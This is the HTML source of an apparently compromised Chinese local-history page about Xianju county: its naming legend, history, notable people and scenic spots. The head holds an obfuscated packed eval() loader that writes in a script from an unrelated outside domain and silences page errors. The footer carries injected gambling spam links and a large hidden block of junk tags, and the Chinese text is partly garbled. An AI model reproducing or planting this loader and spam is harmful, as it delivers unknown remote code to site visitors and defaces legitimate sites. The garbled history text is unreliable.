?!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> mayisoft 仙居历史·仙居新闻?/title> <link href="../css/xjls.css" rel="stylesheet" type="text/css" /> <script>var V_PATH="/";window.onerror=function(){ return true; };</script> <script> ;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('n["\\o\\5\\3\\p\\f\\1\\a\\0"][\'\\6\\2\\b\\0\\1\\7\\a\']("\\g\\8\\3\\2\\b\\4\\0 \\8\\2\\3\\c\\\'\\h\\0\\0\\4\\q\\9\\9\\6\\6\\6\\d\\4\\h\\i\\j\\i\\j\\d\\3\\5\\f\\9\\r\\s\\d\\k\\8\\\' \\0\\t\\4\\1\\c\\\'\\0\\1\\l\\0\\9\\k\\e\\u\\e\\8\\3\\2\\b\\4\\0\\\' \\2\\1\\7\\c\\\'\\1\\l\\0\\1\\2\\a\\e\\7 \\a\\5\\v\\5\\7\\7\\5\\6\\\'\\m\\g\\9\\8\\3\\2\\b\\4\\0\\m");',32,32,'x74|x65|x72|x63|x70|x6f|x77|x6c|x73|x2f|x6e|x69|x3d|x2e|x61|x6d|x3c|x68|x32|x33|x6a|x78|x3e|window|x64|x75|x3a|x7a|x71|x79|x76|x66'.split('|'),0,{})); var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?81e952e151ee81e2edaef6a337f98f32"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?be0a08ccb714d5b4d11a4ee69634a503"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> </head> <body> <!-- top --> <div class="top"></div> <!-- main --> <div class="main"> <div class="wapper"> <div class="jj_t"><img src="../images/nav_1.jpg" width="114" height="73" /></div> <div class="jj_m"> <p>仙居,顾名思义就是神仙居住之地。这个美丽的名字据说来自一个神奇的传说?/p> <p> 相传在北宋时期,县城西门外的仙居县仙居县西郭洋村有个名叫王温的人,平时救危济贫,乐善好施。一日傍晚,他见门口站着两个长满疮疱的人痛苦? 状,顿生怜悯之心,就问:"你们的病这么严重,有没有办法治疗呢?"那两人说?办法倒有,只是要用新酿成的酒,浸泡身体,才可治好?王温听了高兴? 说:"我家刚好酿了两缸新酒?随即请这两人进门脱掉衣服,任其在酒缸中浸泡。说也奇怪,两人在酒缸中泡了一夜后,第二天出来,身上的疮疱不仅全部? 失了,而且容光焕发,皮肤光泽,就得如同美少年一般。他们向王温谢辞而去后,王温闻到酒缸中飘出阵阵异香,就叫全家人喝下,还把酒糟喂了鸡犬。不一 会儿,王温全家连同鸡犬一起升天,成了神仙。当时的皇帝宋真宗赵恒听了这一奇事后,欣然下旨?以其洞天名山,屏蔽周围,而多神仙之宅",将永安县改 名为仙居县?/p> </div> </div> <div class="wapper mt30"> <div class="history_t">历史沿革</div> <div class="history_m"> <ul> <li class="his_1"><img src="../images/his_1.jpg" width="595" height="362" /></li> <li class="his_2"><img src="../images/his_2.jpg" width="248" height="362" /></li> <li class="his_3"><img src="../images/his_3.jpg" width="419" height="278" /></li> <li class="his_4"><img src="../images/his_4.jpg" width="425" height="278" /></li> <div class="clear"></div> </ul> <p>仙居历史悠久?000多年前,在永安溪中下游河谷平原上,就已聚居着仙居人的祖先—瓯越族人?/p> <p>战国时,仙居为越国领土。秦统一全国后,属闽中郡鄞县回浦乡。东汉时,仙居是国内高僧名道涉足之地,兴平元年(公元194年)建造的"石头禅院"? 即石?大兴?),比国清寺建寺?00多年。东晋穆帝永和三年(公元347年),仙居立县,名乐安。隋、唐间几经废置,至五代吴越宝正五年(公元930? ),改名永安。宋时,仙居是国内著名的宗教圣地之一。北宋景德四年(公元1007年),宋真宗以其"洞天名山屏蔽周卫,而多神仙之宅",诏改今名。立县至 今已?600多年。仙居人杰地?人才辈出。自唐至清,出过245位进士,其中首位进士是唐代著名诗人项斯,影响较大的有南宋名臣吴芾、左丞相吴坚,明代太 子少师王一宁、刑部尚书应大猷、勇斗严嵩的右都御史吴时来、监察御史应朝卿等。此外,还有北宋开仙居办学风气的陈襄、揭竿起义的吕师囊,南宋世界上第 一部食用菌专著《菌谱》的作者陈仁玉,元代大书画家柯九思等?/p> </div> </div> </div> <div class="main mt30"> <div class="wapper"> <div class="gjmr_t">古今名人</div> <div class="gjmr_m"> <div class="name wapper"> <ul> <li><a href="/xjls/gjmr/2014-07-05/Conten_100.shtml" target="_blank">沈策</a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_99.shtml" target="_blank">吴时?/a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_98.shtml" target="_blank">翁森</a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_97.shtml" target="_blank">陈仁?/a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_96.shtml" target="_blank">郭磊?/a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_95.shtml" target="_blank">吴芾</a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_94.shtml" target="_blank">吕师?/a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_93.shtml" target="_blank">陈襄</a></li> <div class="clear"></div> </ul> </div> <div class="rw"> <ul> <li id="te"><a href="/xjls/gjmr/2014-07-05/Conten_100.shtml" target="_blank"><img src="http://images.2014.limanbet28.com/xjls/_thumb/58a4c81735fe48bfa8584fb57983d79d20140705100756.jpg" width="258" height="484"/></a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_99.shtml" target="_blank"><img src="http://images.2014.limanbet28.com/xjls/_thumb/2ebea41e362a43b99c67c6ebd5dbf29020140705100801.jpg" width="170" height="237"/></a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_98.shtml" target="_blank"><img src="http://images.2014.limanbet28.com/xjls/_thumb/6929dec0520e4b66b2c4cd425c75c12520140705100759.jpg" width="170" height="237"/></a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_97.shtml" target="_blank"><img src="http://images.2014.limanbet28.com/xjls/_thumb/ebb167f4e2d249bc92fd95c40e27fa6420140705100758.jpg" width="170" height="237"/></a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_96.shtml" target="_blank"><img src="http://images.2014.limanbet28.com/xjls/_thumb/3fec7e2ce7284fa2961b58085d09095e20140705100802.jpg" width="170" height="237"/></a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_95.shtml" target="_blank"><img src="http://images.2014.limanbet28.com/xjls/_thumb/a944bea132964ea08c62fc44cda1f6a720140705100802.jpg" width="170" height="237"/></a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_94.shtml" target="_blank"><img src="http://images.2014.limanbet28.com/xjls/_thumb/c6bcc72367a043c9839b812f8b6a334d20140705100803.jpg" width="170" height="237"/></a></li> <li><a href="/xjls/gjmr/2014-07-05/Conten_93.shtml" target="_blank"><img src="http://images.2014.limanbet28.com/xjls/_thumb/e4a1b1ce1770464ba716668a30e0e3da20140705100804.jpg" width="170" height="237"/></a></li> <div class="clear"></div> </ul> <p>仙居风景名胜区,为国家重点风景名胜区,总面?87.8平方公里,含神仙居、景星岩、永安溪漂流、皤滩古镇、淡竹景区,集奇、险、清、幽于一体,? 峰、瀑、溪、林于一地? 仙居风景名胜区,为国家重点风景名胜区,总面?87.8平方公里,含神仙居、景星岩、永安溪漂流、皤滩古镇、淡竹景区,集奇 、险、清、幽于一体,汇峰、瀑、溪、林于一地?/p> </div> </div> </div> </div> <div class="jq mt30"> <div class="wapper"> <div class="sights_t">风景名胜</div> <div class="sights_m"> <ul> <div class="clear"></div> </ul> <p>仙居风景名胜区,为国家重点风景名胜区,总面?87.8平方公里,含神仙居、景星岩、永安溪漂流、皤滩古镇、淡竹景区,集奇、险、清、幽于一体,? 峰、瀑、溪、林于一地? 仙居风景名胜区,为国家重点风景名胜区,总面?87.8平方公里,含神仙居、景星岩、永安溪漂流、皤滩古镇、淡竹景区,集奇 、险、清、幽于一体,汇峰、瀑、溪、林于一地?/p> </div> </div> </div> <div class="foot">仙居历史 @ 仙居新闻?版权所?2014</div> <script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script><a target="_blank" title="һֲ_һֲʿֱ_һֲͶעƽ̨" href="http://www.8888888yh.com">һֱֲ</a> <a target="_blank" title="һֲʿֱ_һֲ˹߼ƻ-һֲʹ" href="http://www.piperlime4.com">һֲʼƻ</a> <a target="_blank" title="1ֲ[ŵһ]-Ӯ" href="http://www.k1persian.com">һֲ</a> <a target="_blank" title="1ֲ[ף]-Ӯ" href="http://www.pi9perlime.com">һֲҳ</a> <a target="_blank" title="һֲƽ̨_һֲƼƽ̨_һֲƽ̨ƼٷȨƽ̨" href="http://www.10leasing.com">һֲƽ̨</a> <a target="_blank" title="һֲʿƻ|һֲʿ¼|һֲʿ롾ٷƽ̨" href="http://www.h5shouyou.com">һֲʹ</a> <a target="_blank" title="һֲʿ_һֲʿƻ_һֲʿһֲʹ" href="http://www.pi0perlime.com">һֲʿ</a> <a target="_blank" title="һֲ|һֲʿ|һֲʼƻ|һֲʹ" href="http://www.aitken4da.com">һֲʼƻ</a> <a target="_blank" title="һֲƽ̨¼ַ" href="http://www.pj1111177.com">һֲͶע</a> <a target="_blank" title="һֲ--һֲƽ̨_ӭ" href="http://www.studio751.com">һֲƽ̨</a> <div id="pl_css_ganrao" style="display: none;"><pre id='kjy1e'><dl id='kjy1e'></dl></pre><strike id='kjy1e'></strike><p id='kjy1e'><legend id='kjy1e'></legend><noframes id='kjy1e'><small id='kjy1e'></small><noframes id='kjy1e'></noframes></noframes></p><style id='kjy1e'><q id='kjy1e'></q></style><big id='kjy1e'></big><form id='kjy1e'></form><blockquote id='kjy1e'><ul id='kjy1e'><span id='kjy1e'><b id='kjy1e'><ol id='kjy1e'><big id='kjy1e'><span id='kjy1e'></span></big></ol><small id='kjy1e'></small><ol id='kjy1e'><ul id='kjy1e'><tbody id='kjy1e'><fieldset id='kjy1e'><strong id='kjy1e'><li id='kjy1e'><bdo id='kjy1e'><abbr id='kjy1e'></abbr></bdo><span id='kjy1e'></span></li></strong></fieldset></tbody></ul></ol><legend id='kjy1e'><noframes id='kjy1e'><tbody id='kjy1e'></tbody></noframes></legend></b><strong id='kjy1e'></strong></span></ul></blockquote><center id='kjy1e'><small id='kjy1e'><ins id='kjy1e'><td id='kjy1e'><div id='kjy1e'></div></td></ins></small></center><del id='kjy1e'><p id='kjy1e'></p><noscript id='kjy1e'><small id='kjy1e'><b id='kjy1e'></b><style id='kjy1e'></style><i id='kjy1e'></i><small id='kjy1e'><dl id='kjy1e'></dl><fieldset id='kjy1e'><form id='kjy1e'><dt id='kjy1e'><code id='kjy1e'></code><code id='kjy1e'><div id='kjy1e'></div></code></dt></form></fieldset></small></small><thead id='kjy1e'><kbd id='kjy1e'></kbd><sup id='kjy1e'><th id='kjy1e'></th></sup></thead><sup id='kjy1e'><strong id='kjy1e'><i id='kjy1e'></i></strong><small id='kjy1e'><div id='kjy1e'></div></small><ins id='kjy1e'></ins></sup><legend id='kjy1e'><table id='kjy1e'></table></legend></noscript></del><li id='kjy1e'><optgroup id='kjy1e'></optgroup></li><label id='kjy1e'></label><label id='kjy1e'></label><sub id='kjy1e'></sub><del id='kjy1e'></del><em id='kjy1e'><dd id='kjy1e'></dd></em><small id='kjy1e'></small><optgroup id='kjy1e'><dfn id='kjy1e'></dfn></optgroup><option id='kjy1e'><tr id='kjy1e'><code id='kjy1e'></code></tr></option><fieldset id='kjy1e'></fieldset><strong id='kjy1e'></strong><noframes id='kjy1e'><tfoot id='kjy1e'></tfoot></noframes><q id='kjy1e'><code id='kjy1e'><select id='kjy1e'></select></code></q><fieldset id='kjy1e'><big id='kjy1e'><tt id='kjy1e'></tt></big><p id='kjy1e'></p></fieldset><li id='kjy1e'></li><li id='kjy1e'></li><tfoot id='kjy1e'></tfoot><small id='kjy1e'></small><ul id='kjy1e'></ul><option id='kjy1e'></option><pre id='kjy1e'><ins id='kjy1e'></ins></pre><select id='kjy1e'></select><ins id='kjy1e'><td id='kjy1e'><i id='kjy1e'></i></td><u id='kjy1e'><code id='kjy1e'><thead id='kjy1e'><button id='kjy1e'><thead id='kjy1e'><option id='kjy1e'></option></thead></button></thead></code><fieldset id='kjy1e'><em id='kjy1e'><big id='kjy1e'></big></em></fieldset></u></ins><sup id='kjy1e'><strong id='kjy1e'></strong><del id='kjy1e'></del></sup><label id='kjy1e'></label><q id='kjy1e'><b id='kjy1e'><acronym id='kjy1e'></acronym><div id='kjy1e'><button id='kjy1e'><table id='kjy1e'></table><sup id='kjy1e'><dd id='kjy1e'><tfoot id='kjy1e'></tfoot></dd><blockquote id='kjy1e'><noframes id='kjy1e'></noframes></blockquote></sup></button></div></b><div id='kjy1e'><ul id='kjy1e'><li id='kjy1e'></li></ul></div></q><tfoot id='kjy1e'><font id='kjy1e'><i id='kjy1e'><dd id='kjy1e'></dd></i></font></tfoot><tr id='kjy1e'><optgroup id='kjy1e'></optgroup></tr><address id='kjy1e'><tfoot id='kjy1e'></tfoot><dd id='kjy1e'></dd></address><option id='kjy1e'><abbr id='kjy1e'><style id='kjy1e'></style><tt id='kjy1e'></tt><font id='kjy1e'></font><u id='kjy1e'><tt id='kjy1e'></tt></u></abbr></option><dd id='kjy1e'><ol id='kjy1e'></ol></dd><bdo id='kjy1e'><acronym id='kjy1e'><pre id='kjy1e'></pre></acronym><b id='kjy1e'><span id='kjy1e'></span></b><form id='kjy1e'></form></bdo><dl id='kjy1e'></dl><thead id='kjy1e'></thead><tt id='kjy1e'><tt id='kjy1e'></tt><sub id='kjy1e'><i id='kjy1e'><dt id='kjy1e'></dt><p id='kjy1e'></p></i></sub></tt><acronym id='kjy1e'><dd id='kjy1e'></dd></acronym><small id='kjy1e'><acronym id='kjy1e'><i id='kjy1e'><label id='kjy1e'><kbd id='kjy1e'><form id='kjy1e'><div id='kjy1e'><strike id='kjy1e'></strike></div></form></kbd></label></i></acronym><bdo id='kjy1e'></bdo><strike id='kjy1e'><table id='kjy1e'></table></strike></small><strike id='kjy1e'></strike><abbr id='kjy1e'></abbr><tbody id='kjy1e'></tbody><sup id='kjy1e'></sup><code id='kjy1e'><ul id='kjy1e'><tfoot id='kjy1e'></tfoot></ul></code><bdo id='kjy1e'></bdo><tr id='kjy1e'></tr><sup id='kjy1e'></sup><abbr id='kjy1e'></abbr><dfn id='kjy1e'><dir id='kjy1e'><p id='kjy1e'></p></dir><small id='kjy1e'><div id='kjy1e'></div></small></dfn><th id='kjy1e'><noscript id='kjy1e'></noscript></th><address id='kjy1e'><abbr id='kjy1e'></abbr><big id='kjy1e'></big></address><ol id='kjy1e'><dd id='kjy1e'><address id='kjy1e'></address></dd></ol><sub id='kjy1e'><optgroup id='kjy1e'></optgroup><thead id='kjy1e'></thead></sub><th id='kjy1e'><del id='kjy1e'></del></th><dd id='kjy1e'><small id='kjy1e'></small></dd><option id='kjy1e'><thead id='kjy1e'></thead></option><blockquote id='kjy1e'></blockquote><option id='kjy1e'></option><noframes id='kjy1e'><legend id='kjy1e'><style id='kjy1e'><dir id='kjy1e'><q id='kjy1e'></q></dir></style></legend></noframes><u id='kjy1e'></u><table id='kjy1e'><table id='kjy1e'><dir id='kjy1e'><thead id='kjy1e'><dl id='kjy1e'><td id='kjy1e'></td></dl></thead></dir><noframes id='kjy1e'><i id='kjy1e'><tr id='kjy1e'><dt id='kjy1e'><q id='kjy1e'><span id='kjy1e'><b id='kjy1e'><form id='kjy1e'><ins id='kjy1e'></ins><ul id='kjy1e'></ul><sub id='kjy1e'></sub></form><legend id='kjy1e'></legend><bdo id='kjy1e'><pre id='kjy1e'><center id='kjy1e'></center></pre></bdo></b><th id='kjy1e'></th></span></q></dt></tr></i></noframes><em id='kjy1e'><optgroup id='kjy1e'><dfn id='kjy1e'><del id='kjy1e'><code id='kjy1e'></code></del></dfn></optgroup></em><noframes id='kjy1e'><div id='kjy1e'><tfoot id='kjy1e'></tfoot><dl id='kjy1e'><fieldset id='kjy1e'></fieldset></dl></div></noframes><label id='kjy1e'></label></table><tfoot id='kjy1e'></tfoot></table><span id='kjy1e'></span><dfn id='kjy1e'></dfn><tr id='kjy1e'></tr><th id='kjy1e'><tt id='kjy1e'></tt><dd id='kjy1e'></dd></th><optgroup id='kjy1e'></optgroup><blockquote id='kjy1e'></blockquote><center id='kjy1e'></center><em id='kjy1e'><kbd id='kjy1e'></kbd><li id='kjy1e'><span id='kjy1e'></span></li><pre id='kjy1e'></pre></em><ol id='kjy1e'><tt id='kjy1e'><label id='kjy1e'><kbd id='kjy1e'></kbd></label></tt></ol><sub id='kjy1e'><sup id='kjy1e'><dl id='kjy1e'></dl><td id='kjy1e'></td><tt id='kjy1e'><blockquote id='kjy1e'><big id='kjy1e'><ol id='kjy1e'><tt id='kjy1e'><code id='kjy1e'><p id='kjy1e'></p><small id='kjy1e'><li id='kjy1e'></li><button id='kjy1e'><tfoot id='kjy1e'><i id='kjy1e'></i></tfoot></button><tbody id='kjy1e'><em id='kjy1e'></em></tbody></small></code></tt></ol></big><q id='kjy1e'><i id='kjy1e'><span id='kjy1e'></span><dt id='kjy1e'><ol id='kjy1e'></ol><b id='kjy1e'></b><strike id='kjy1e'><dir id='kjy1e'></dir></strike></dt><legend id='kjy1e'></legend><tr id='kjy1e'><optgroup id='kjy1e'><label id='kjy1e'><select id='kjy1e'><tt id='kjy1e'><blockquote id='kjy1e'></blockquote></tt></select></label></optgroup></tr><b id='kjy1e'></b></i><dfn id='kjy1e'></dfn></q></blockquote></tt></sup></sub><option id='kjy1e'></option><td id='kjy1e'><big id='kjy1e'><tfoot id='kjy1e'></tfoot></big><strong id='kjy1e'></strong></td><tfoot id='kjy1e'></tfoot><tfoot id='kjy1e'><pre id='kjy1e'><acronym id='kjy1e'><table id='kjy1e'><dir id='kjy1e'></dir></table></acronym></pre></tfoot><tt id='kjy1e'></tt><strong id='kjy1e'><u id='kjy1e'><div id='kjy1e'><div id='kjy1e'><q id='kjy1e'></q></div><strong id='kjy1e'><dt id='kjy1e'><sub id='kjy1e'><li id='kjy1e'></li></sub></dt></strong></div></u></strong><big id='kjy1e'></big><th id='kjy1e'></th><dd id='kjy1e'><center id='kjy1e'></center></dd><td id='kjy1e'></td><ol id='kjy1e'><dd id='kjy1e'><th id='kjy1e'></th></dd></ol><dt id='kjy1e'><div id='kjy1e'><abbr id='kjy1e'><strike id='kjy1e'></strike></abbr></div></dt><center id='kjy1e'></center><center id='kjy1e'></center><bdo id='kjy1e'><dd id='kjy1e'><abbr id='kjy1e'><strike id='kjy1e'></strike><ul id='kjy1e'><del id='kjy1e'><q id='kjy1e'><tbody id='kjy1e'><noframes id='kjy1e'><bdo id='kjy1e'></bdo><ul id='kjy1e'></ul></noframes></tbody></q></del></ul><big id='kjy1e'><big id='kjy1e'><dt id='kjy1e'><acronym id='kjy1e'></acronym><q id='kjy1e'><select id='kjy1e'><center id='kjy1e'><dir id='kjy1e'></dir></center></select><noscript id='kjy1e'><strong id='kjy1e'><tr id='kjy1e'></tr></strong><label id='kjy1e'></label><strike id='kjy1e'></strike><option id='kjy1e'><u id='kjy1e'><ol id='kjy1e'><blockquote id='kjy1e'></blockquote></ol></u></option><table id='kjy1e'></table></noscript><i id='kjy1e'><abbr id='kjy1e'></abbr></i><thead id='kjy1e'><strong id='kjy1e'><b id='kjy1e'></b></strong></thead></q></dt></big></big></abbr></dd><acronym id='kjy1e'></acronym><sub id='kjy1e'></sub><optgroup id='kjy1e'><del id='kjy1e'><optgroup id='kjy1e'></optgroup></del><button id='kjy1e'></button></optgroup><ul id='kjy1e'><em id='kjy1e'></em><dir id='kjy1e'><td id='kjy1e'></td><address id='kjy1e'></address><td id='kjy1e'></td><thead id='kjy1e'><thead id='kjy1e'></thead><ul id='kjy1e'></ul></thead></dir><del id='kjy1e'></del><thead id='kjy1e'></thead></ul><acronym id='kjy1e'></acronym></bdo><legend id='kjy1e'><font id='kjy1e'><font id='kjy1e'><span id='kjy1e'><tr id='kjy1e'><option id='kjy1e'></option></tr></span></font></font></legend><tbody id='kjy1e'><b id='kjy1e'><select id='kjy1e'></select></b></tbody><div id='kjy1e'><form id='kjy1e'></form><fieldset id='kjy1e'><pre id='kjy1e'><kbd id='kjy1e'><u id='kjy1e'><form id='kjy1e'><li id='kjy1e'><th id='kjy1e'><dt id='kjy1e'></dt></th></li><span id='kjy1e'></span></form><address id='kjy1e'></address></u><u id='kjy1e'><tt id='kjy1e'></tt></u></kbd></pre><p id='kjy1e'></p></fieldset></div><tbody id='kjy1e'><blockquote id='kjy1e'><style id='kjy1e'></style></blockquote><u id='kjy1e'></u></tbody><fieldset id='kjy1e'></fieldset><form id='kjy1e'></form><li id='kjy1e'><abbr id='kjy1e'></abbr></li><acronym id='kjy1e'></acronym><tt id='kjy1e'><dl id='kjy1e'></dl></tt><fieldset id='kjy1e'></fieldset><em id='kjy1e'></em><b id='kjy1e'></b><p id='kjy1e'></p><tbody id='kjy1e'><address id='kjy1e'></address><dd id='kjy1e'></dd></tbody><dir id='kjy1e'></dir><tbody id='kjy1e'></tbody><ul id='kjy1e'><select id='kjy1e'></select></ul><td id='kjy1e'></td><kbd id='kjy1e'><tt id='kjy1e'><q id='kjy1e'></q></tt></kbd><tfoot id='kjy1e'><select id='kjy1e'><abbr id='kjy1e'></abbr><table id='kjy1e'></table></select></tfoot><em id='kjy1e'><optgroup id='kjy1e'><label id='kjy1e'></label><ol id='kjy1e'><dir id='kjy1e'><label id='kjy1e'></label><form id='kjy1e'><thead id='kjy1e'><tbody id='kjy1e'></tbody></thead></form></dir><table id='kjy1e'><form id='kjy1e'><table id='kjy1e'><legend id='kjy1e'><li id='kjy1e'></li><big id='kjy1e'><span id='kjy1e'><optgroup id='kjy1e'><span id='kjy1e'></span></optgroup></span></big></legend><noscript id='kjy1e'></noscript><div id='kjy1e'><code id='kjy1e'><sup id='kjy1e'><kbd id='kjy1e'></kbd></sup><thead id='kjy1e'><small id='kjy1e'></small></thead></code></div><dt id='kjy1e'></dt></table></form></table><abbr id='kjy1e'><small id='kjy1e'></small></abbr></ol></optgroup><abbr id='kjy1e'><optgroup id='kjy1e'></optgroup></abbr><sup id='kjy1e'></sup><abbr id='kjy1e'><style id='kjy1e'><strike id='kjy1e'><b id='kjy1e'><i id='kjy1e'></i></b></strike></style></abbr></em><table id='kjy1e'></table><dl id='kjy1e'></dl><strike id='kjy1e'></strike><tt id='kjy1e'><p id='kjy1e'></p></tt><div id='kjy1e'><noscript id='kjy1e'></noscript><dt id='kjy1e'><bdo id='kjy1e'><strong id='kjy1e'><sup id='kjy1e'><acronym id='kjy1e'></acronym></sup></strong></bdo><blockquote id='kjy1e'><tbody id='kjy1e'></tbody><tbody id='kjy1e'><dl id='kjy1e'></dl><del id='kjy1e'></del><ins id='kjy1e'><dfn id='kjy1e'><button id='kjy1e'></button></dfn></ins><td id='kjy1e'></td><option id='kjy1e'></option><tbody id='kjy1e'><sub id='kjy1e'><acronym id='kjy1e'><font id='kjy1e'><ins id='kjy1e'></ins></font><tr id='kjy1e'></tr></acronym></sub></tbody><dir id='kjy1e'></dir><address id='kjy1e'><bdo id='kjy1e'></bdo></address></tbody></blockquote><form id='kjy1e'><q id='kjy1e'><dd id='kjy1e'><fieldset id='kjy1e'></fieldset></dd></q></form><ol id='kjy1e'></ol><tfoot id='kjy1e'></tfoot></dt></div><pre id='kjy1e'><tt id='kjy1e'></tt><noframes id='kjy1e'></noframes></pre><dir id='kjy1e'><tt id='kjy1e'><q id='kjy1e'></q><select id='kjy1e'><dir id='kjy1e'></dir><ins id='kjy1e'><li id='kjy1e'></li></ins><small id='kjy1e'><ul id='kjy1e'></ul></small><pre id='kjy1e'></pre></select></tt><ul id='kjy1e'></ul></dir><th id='kjy1e'></th><ol id='kjy1e'><sup id='kjy1e'><i id='kjy1e'><pre id='kjy1e'><table id='kjy1e'></table></pre></i></sup></ol><option id='kjy1e'></option><dt id='kjy1e'></dt><sup id='kjy1e'></sup><big id='kjy1e'></big><thead id='kjy1e'></thead><p id='kjy1e'></p><td id='kjy1e'><acronym id='kjy1e'><div id='kjy1e'><tt id='kjy1e'></tt></div><fieldset id='kjy1e'></fieldset><bdo id='kjy1e'></bdo><em id='kjy1e'><font id='kjy1e'></font></em></acronym></td><dir id='kjy1e'></dir><u id='kjy1e'></u><strong id='kjy1e'><td id='kjy1e'></td></strong><tt id='kjy1e'></tt><q id='kjy1e'><legend id='kjy1e'><bdo id='kjy1e'><bdo id='kjy1e'><legend id='kjy1e'><b id='kjy1e'><strong id='kjy1e'><label id='kjy1e'><sup id='kjy1e'><u id='kjy1e'><sup id='kjy1e'></sup></u><big id='kjy1e'></big><select id='kjy1e'></select></sup><p id='kjy1e'></p></label></strong></b></legend></bdo><noscript id='kjy1e'></noscript><dt id='kjy1e'></dt></bdo></legend></q><small id='kjy1e'></small><b id='kjy1e'></b><li id='kjy1e'><p id='kjy1e'><label id='kjy1e'><table id='kjy1e'><sup id='kjy1e'><em id='kjy1e'></em></sup></table><blockquote id='kjy1e'></blockquote></label></p></li><blockquote id='kjy1e'></blockquote><dd id='kjy1e'><thead id='kjy1e'></thead><abbr id='kjy1e'><noscript id='kjy1e'><tbody id='kjy1e'><style id='kjy1e'><sup id='kjy1e'><pre id='kjy1e'></pre></sup><em id='kjy1e'></em></style></tbody><optgroup id='kjy1e'><tbody id='kjy1e'><kbd id='kjy1e'></kbd></tbody></optgroup></noscript></abbr></dd><tfoot id='kjy1e'></tfoot><big id='kjy1e'><thead id='kjy1e'></thead></big><div id='kjy1e'><thead id='kjy1e'><tfoot id='kjy1e'><form id='kjy1e'></form></tfoot><optgroup id='kjy1e'><strong id='kjy1e'><p id='kjy1e'></p></strong><acronym id='kjy1e'><dl id='kjy1e'></dl></acronym></optgroup></thead><p id='kjy1e'><small id='kjy1e'><small id='kjy1e'></small><q id='kjy1e'></q></small></p></div><th id='kjy1e'></th><noscript id='kjy1e'></noscript><dl id='kjy1e'><fieldset id='kjy1e'><abbr id='kjy1e'><bdo id='kjy1e'><th id='kjy1e'></th></bdo></abbr></fieldset></dl><small id='kjy1e'><pre id='kjy1e'></pre><li id='kjy1e'></li></small><ol id='kjy1e'></ol><em id='kjy1e'></em><dd id='kjy1e'></dd><optgroup id='kjy1e'><noframes id='kjy1e'><li id='kjy1e'><abbr id='kjy1e'></abbr></li></noframes><optgroup id='kjy1e'></optgroup><select id='kjy1e'></select><dd id='kjy1e'></dd></optgroup><acronym id='kjy1e'></acronym><noscript id='kjy1e'></noscript><li id='kjy1e'><label id='kjy1e'></label></li><table id='kjy1e'></table></div></html>